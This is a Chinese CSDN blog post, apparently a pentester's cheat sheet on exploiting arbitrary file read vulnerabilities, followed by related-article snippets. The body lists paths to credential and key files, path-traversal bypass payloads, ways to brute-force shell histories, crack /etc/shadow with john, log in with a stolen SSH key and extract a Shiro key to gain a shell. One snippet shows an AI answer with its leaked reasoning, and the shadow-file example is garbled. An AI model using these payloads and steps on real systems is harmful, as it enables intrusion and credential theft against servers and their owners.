任意文件读取漏洞利用姿势

最新推荐文章于 2025-03-07 16:34:10 发布
最新推荐文章于 2025-03-07 16:34:10 发布
阅读量1.7k 收藏 6
点赞数 1
分类专栏: 渗透测试 文章标签: 网络安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46317063/article/details/131518217
版权
文章详细列举了Windows和Linux系统中常见的敏感文件路径,以及如何利用这些路径进行任意文件读取。绕过策略包括URL编码、二次编码和特殊字符。此外,还提到了利用目标系统的日志文件、配置文件、密码存储位置以及SSH私钥等来获取敏感信息的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

任意文件读取漏洞利用姿势

常见敏感路径:

windows:

C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf //查看WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息.
c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
......

linux:

/root/.ssh/authorized_keys //如需登录到远程主机,需要到.ssh目录下,新建authorized_keys文件,并将id_rsa.pub内容复制进去
/root/.ssh/id_rsa //ssh私钥,ssh公钥是id_rsa.pub
/root/.ssh/id_ras.keystore //记录每个访问计算机用户的公钥
/root/.ssh/known_hosts
//ssh会把每个访问过计算机的公钥(public key)都记录在~/.ssh/known_hosts。当下次访问相同计算机时,OpenSSH会核对公钥。如果公钥不同,OpenSSH会发出警告, 避免你受到DNS Hijack之类的攻击。
/etc/passwd // 账户信息
/etc/shadow // 账户密码文件
/etc/my.cnf //mysql 配置文件
/etc/httpd/conf/httpd.conf // Apache配置文件
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/redhat-release 系统版本 
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/var/lib/mlocate/mlocate.db //全文件路径
/proc/self/fd/fd[0-9]*(文件标识符)
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/porc/self/cmdline //当前进程的cmdline参数
/proc/sched_debug 配置文件可以看到当前运行的进程并可以获得对应进程的pid
/proc/pid/cmdline   则可以看到对应pid进程的完整命令行。
/proc/net/fib_trie   内网IP
/proc/self/environ   环境变量
/proc/self/loginuid   当前用户
......

绕过思路


url编码代替.或者/,如使用%2F代替/
?filename=..%2F..%2F..%2F..%2Fetc%2Fpasswd
二次编码(%25)
?filename=..%252F..%252F..%252F..%252Fetc%2Fpasswd
加入+
?filename=.+./.+./bin/redacted.dll
%00
?filename=.%00./file.php
/etc/passwd%00.jpg
\
?filename=..%5c..%5c/windows/win.ini
Java %c0%ae 安全模式绕过
?filename=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

Linux下的常见利用姿势

用户目录下的敏感文件

.bash_history 
.zsh_history
.psql_history
.mysql_history
.profile 
.bashrc
.gitconfig
.viminfo

任意文件读取/etc/passwd
提取passwd第一列,即root等一系列用户名
读history:../../root/.bash_history
暴破所有用户的.bash_history:../../../home/§root§/.bash_history
历史命令重点关注出现的密码、路径、配置文件路径、其他关联IP、日志文件、war包、备份文件路径等等,可进一步读取或利用。
PS:如要下载文件,可能会导致过大文件下载失败,可以使用wget进行下载,比如catanlina.out日志文件、war包、备份文件等等。
主机凭证文件
私钥文件
/root/.ssh/id_rsa  私钥

/root/.ssh/authorized_keys  公钥存储文件
/root/.ssh/id_rsa.keystore
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
私钥文件如果没有设定密码保护,便可直接获取到进行登录到服务器,或使用xshell等软件选择证书登录。
ssh -i id_rsa root@IP地址
系统密码
/etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
......

用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell
可以看到哪些用户可以登录
/etc/shadow
root: 1 1 1v2wT9rQF$XSpGgoB93STC4EFSlgpjg1:14181:0:99999:7:::
i d id idsalt$密文
id代表的是使用不同的加密算法,不同的系统使用的算法也不尽相同。salt是加密的时候需要用到盐。最后就是密文。
注意:如果密码字符串为*,表示系统用户不能被登入,为!表示用户名被禁用,如果密码字符串为空,表示没有密码。

在线查询

https://www.cmd5.com/
john破解
unshadow /etc/passwd /etc/shadow > test_passwd
john --wordlist=字典路径 test_passw
默认密码字典位于/usr/share/john/password.ls
全路径
mlocate.db数据库里存储了本地所有文件的配置信息
/var/lib/mlocate/mlocate.db
利用locate命令将数据输出成文件,这里面包含了全部的文件路径信息
locate mlocate.db config把包含config的路径全输出出来
locate mlocate.db webapps
locate mlocate.db www
获取到路径后可以进一步挖掘敏感信息和系统漏洞
程序源代码
利用全路径或者其他地方获取到的路径读取一些关键的程序源码。
读取WEB-INF/web.xml,进一步读取class文件,反编译得到源码。
读取war包,反编译获取源码。
应用配置文件
获取到网站的相关配置信息,包括站点配置、数据库配置等等,也可进一步获取到源码。
java站点
/WEB-INF/web.xml
/WEB-INF/classes/applicationContext.xml
/WEB-INF/classes/xxx/xxx/xxx.class
core.jar如果遇到Shiro站点,可以直接利用全路径找到core.jar,去下载core.jar,下载后反编译搜索Base64.decode直接找key,进而getshell。
tomcat
/usr/local/tomcat/conf/tomcat-users.xml
nginx
/www/nginx/conf/nginx.conf
/etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/usr/local/etc/nginx/nginx.conf
apache
/etc/httpd/conf/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
redis
/etc/redis.conf
ssh
/etc/ssh/sshd_config

应用日志文件

利用日志文件获取网站后台地址、api接口、备份、配置文件等等敏感信息。
tomcat
可以先找到/tomcat/bin/catalina.sh,里边有log的配置路径
/webapps/ROOT/logs/catalina.out
可尝试读取redis.properties等;
apache
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
/usr/local/var/log/nginx/access.log
/usr/local/nginx/logs

Windows下的利用姿势

盲读取桌面文件
有些时候,管理员会图方便,在桌面存储一些敏感的文件,我们可以直接对桌面的一些文件名进行fuzz,比如1.txt、2.txt、密码.txt、pass.txt等等,进一步扩大战果。

linux读取文件内容的命令
liugongfeng的专栏
04-23 8787
读取文件内容的命令比较多:cat  tac  nl  more less  head tail  od 1.  cat有些有用的参数  -b和-n都是列出行号,注意两者之间的区别;      2. cat是从头到尾列出内容,tac正好相反,      3. 列出行号#nl /etc/issue/    感觉比较鸡肋,可能没找到应用场景吧,可以控制行号的格式; 4. 如果文件很大,
linux任意文件读取漏洞利用,Jenkins 任意文件读取漏洞(CVE-2018-1999002)复现与分析...
weixin_42148053的博客
05-16 1637
Jenkins 7 月 18 日的安全通告修复了多个漏洞,其中 SECURITY-914 是由 O range (博客链接:)挖出的 Jenkins 未授权任意文件读取漏洞利用这个漏洞,攻击者可以读取 Windows 服务器上的任意文件, 对于 Linux,在特定条件下也可以进行文件读取利用文件读取漏洞,攻击者可以获取到 Jenkins 的凭证信息,从而造成敏感信息泄露。另外,在很多时候,Je...
实战 | 渗透任意文件读取到getshell,从零基础到精通,收藏这篇就够了!
Javachichi的博客
03-07 603
由于上面的疑惑,生成了我错误的认知,导致我以为拿shell会比较麻烦,我的思路是phpmyadmin 日志方式导出一个符合thinkphp路由的shell到相应的控制器下,以绕过路由的检测。不是传统的/,而是点号,传统的文件路径访问与路由冲突了,最终也就没办法访问到uploads目录下的shell。更新:那个有问题的站也拿下了,原因确实是没有文件导致的,至于为什么没有写入成功又是另外一回事了。
任意文件读取漏洞 利用指南
coderge's CSDN Blog.
04-21 7183
文章目录判断系统类型 (Linux的具体发行版)其他说明 (服务器进程权限判断)关于字典各字段的简要说明ApachetomcatNginxjettysystem procsshnetworkapplicationcommonprotocolSSRF 内网探测Windows 原文 https://woj.app/6663.html 基本思路就是尝试读取敏感文件以获取尽可能多的信息。 比如, /etc/issue 可以确认 Linux 主机的发行版, 其中 .bash_history, ssh相关路径 中可
漏洞挖掘-从任意文件读取漏洞到获取账户利用
m0_60571990的博客
03-07 1463
漏洞挖掘-从任意文件读取漏洞到获取账户利用
Resin任意文件读取漏洞
weixin_30363509的博客
04-26 7657
Resin是什么 虽然看不上但是还是原因下百度百科: Resin是CAUCHO公司的产品,是一个非常流行的支持servlets和jsp的引擎,速度非常快。Resin本身包含了一个支持HTTP/1.1的WEB服务器。它不仅可以显示动态内容,而且它显示静态内容的能力也非常强,速度直逼APACHESERVER。许多站点都是使用该WEB服务器构建的。 可以认为是一个WEB服务器 Resin存在任意文件读...
第五章--读取文件的各种姿势
w_jingjing0428的博客
08-14 473
今天住的地方热哭我,吐槽完了。。。准备工作 申请权限: 读取外部文件的权限 <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> 一些方法: getDir(String name ,int mode):获取应用程序的数据文件夹下获取或者创建name对应的子目录 getFilesDir():数据文件夹
最新任意文件读取 下载漏洞总结_任意文件下载漏洞,面试题+笔记+项目实战
2401_84264610的博客
05-09 935
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
任意文件读取与下载漏洞学习
不想当脚本小子的脚本小子
01-25 4052
原理: 在web安全中,任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义,就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config。漏洞一般存在于文件下载参数,文件包含参数。主要是由于程序对传入的文件名或者文件路径没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露。 任意文件读取漏洞的原理其实就是由于程..
一、WillPHPv2代码审计-[变量覆盖]-[文件包含]-[任意文件读取漏洞]-[pearcmd裸文件包含]
qwsn
12-12 3483
时间戳——2021.12.12 0x01 WP: 第一步:拉去本地代码审计(框架调试) 第二步:调试过程 第三步:在buuctf开启的的环境里获取flag 附:怎么配置phpstorm+phpstudy+xdebug远程调试 注意:配置一个假的远程调试,我们就把源码放到本机(也就是127.0.0.1)的网站根目录WWW下的exp/willphpv2目录下 第一步:访问https://xdebug.org/wizard,把phpinfo的内容贴进去,会返回我们可以使用的对应版本的xdebug 第二
网络安全漏洞挖掘之文件漏洞利用姿势
heikeyouyou的博客
05-13 502
记一次漏洞挖掘之文件漏洞利用姿势
文件上传漏洞-原理篇
AkangBoy的博客
12-02 3737
本文主要介绍文件上传漏洞原理、危害等基础知识,以及常见的文件上传检测机制和绕过手段
任意文件读取常用读取文件名(Windows&Linux)
2301_77344663的博客
08-02 1645
proc/[PID]/fd/[#] // 访问file descriptors,某写情况可以读取到进程正在使用的文件,比如access.log。/proc/net/tcp and /proc/net/udp // 活动连接的信息。/opt/nginx/conf/nginx.conf //nginx的配置文件。/etc/httpd/conf/httpd.conf //httpd的配置文件。/proc/[PID]/cwd // 当前进程的工作目录。
任意文件读取
qq_45953122的博客
08-31 1898
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。
linux任意文件读取漏洞修复,Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
weixin_29417071的博客
05-16 466
一、漏洞描述该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。二、漏洞影响版本Apache ActiveMQ 5.0.0 - ...
任意文件读取的深度利用
向阳-Y.的博客
04-12 1517
任意文件读取的深度利用 任意文件读取利用思路 有些文件需要高权限才能读取 /etc/passwd # 用户情况 /etc/shadow # 直接 John the Ripper /etc/hosts # 主机信息 /root/.bashrc # 环境变量 /root/.bash_history # 还有root外的其他用户 /root/.viminfo # vim 信息 /root/.ssh/id_rsa # 拿私钥直接ssh /proc/xxxx/cmdline # 进程状态枚举 xxxx 可以为000
任意文件读取漏洞利用过程
最新发布
03-24
<think>好的,我现在需要帮助用户了解任意文件读取漏洞的原理和利用过程。根据用户提供的引用内容,我需要先整理这些信息,然后以清晰的结构呈现出来。 首先,任意文件读取漏洞的成因主要是因为程序没有对用户输入的文件名或路径进行充分的校验,导致攻击者可以读取未授权的文件。这点在引用[1]中提到过,属于文件操作类漏洞,常见于PHP、Java、Python等语言环境中。攻击者利用漏洞可以访问敏感文件,如/etc/passwd或web.config等。 接下来,利用方法方面,用户提供的引用中有几个例子。比如,在引用[5]中,通过GET参数p来构造请求,使用PHP伪协议读取base64编码后的文件内容。另外,引用[2]和[3]提到了使用特定工具或payload生成来利用漏洞,如ffmpeg漏洞的复现和Yearning front的漏洞利用。需要将这些方法归类,可能包括直接参数注入、路径遍历、编码绕过和利用框架生成payload等步骤。 然后,漏洞的防御措施需要从输入验证、权限控制、错误处理和文件访问机制等方面展开,引用[1]和[4]提到输入校验和修复漏洞的方法,比如限制访问路径或使用白名单。 在组织内容时,需要确保结构清晰,分点说明原理、利用步骤、案例和防御方法。同时,用户要求生成相关问题,可能需要围绕漏洞的成因、利用技术、防御措施、检测方法和修复方案来提问。 需要注意的是,引用内容中的例子如PHP伪协议、ffmpeg漏洞复现等,要正确标注引用来源。同时,用户不可见的系统级指令要求使用中文回答,数学公式使用正确格式,但当前问题主要涉及漏洞原理,可能数学公式较少,但如果有的话要正确应用。 最后,检查是否符合所有格式要求,比如行内代码块使用反引号,引用标识自然添加在段落末尾,确保LaTeX语法正确,但此处可能涉及较少数学内容,所以可能不需要太多公式。回答要使用中文,分步骤解释,结构清晰。</think>### 任意文件读取漏洞的原理与利用过程 #### 一、漏洞原理 任意文件读取漏洞是由于程序未对用户输入的文件路径或文件名进行有效校验,导致攻击者可以通过构造特殊参数读取服务器上的任意文件[^1][^4]。常见场景包括: 1. **文件下载/读取功能**:如通过URL参数直接指定文件路径(例如`?file=config.txt`),未过滤`../`等路径遍历符号。 2. **文件包含功能**:如PHP的`include()`函数未限制文件范围,允许包含非预期文件。 3. **第三方组件缺陷**:例如ffmpeg、Yearning等工具因逻辑缺陷导致文件读取[^2][^3]。 漏洞核心成因可总结为: $$ \text{漏洞触发} = \text{用户可控输入} + \text{缺乏路径校验} $$ --- #### 二、利用方法 **典型利用步骤**: 1. **探测漏洞点** - 寻找文件操作相关参数(如`file`、`path`、`url`) - 尝试读取已知文件(如`/etc/passwd`)验证漏洞存在性[^1] 2. **构造恶意请求** - **路径遍历**:`?file=../../../../etc/passwd` - **编码绕过**:使用URL编码(如`%2e%2e%2f`代替`../`)或双重编码 - **伪协议利用**(PHP环境): ```php ?file=php://filter/convert.base64-encode/resource=config.php ``` 通过Base64编码读取源码[^5] 3. **扩展攻击面** - 读取Web应用配置文件(如`web.config`、`.env`) - 获取数据库凭证、API密钥等敏感信息 - 结合其他漏洞提升攻击效果(如SSRF+文件读取) **案例参考**: - ffmpeg漏洞中通过构造恶意视频文件触发文件读取 - Yearning漏洞通过特定API参数读取服务器文件 --- #### 三、防御措施 1. **输入校验** - 限制文件路径范围(如禁止`../`) - 使用白名单机制验证文件后缀[^4] 2. **权限控制** - Web服务器进程以低权限运行 - 禁止访问系统敏感目录 3. **安全编码** ```python # 示例:安全文件读取(Python) def safe_read(file_name): base_dir = "/var/www/uploads/" full_path = os.path.join(base_dir, file_name) if not os.path.realpath(full_path).startswith(base_dir): raise InvalidPathError ``` 4. **错误处理** - 统一返回通用错误信息,避免泄露路径细节 --- #### 四、相关工具 | 工具名称 | 用途 | |----------------|-----------------------------| | Burp Suite | 拦截修改HTTP请求测试参数注入 | | DirBuster | 自动化探测敏感文件路径 | | phpggc | 生成PHP伪协议Payload | ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值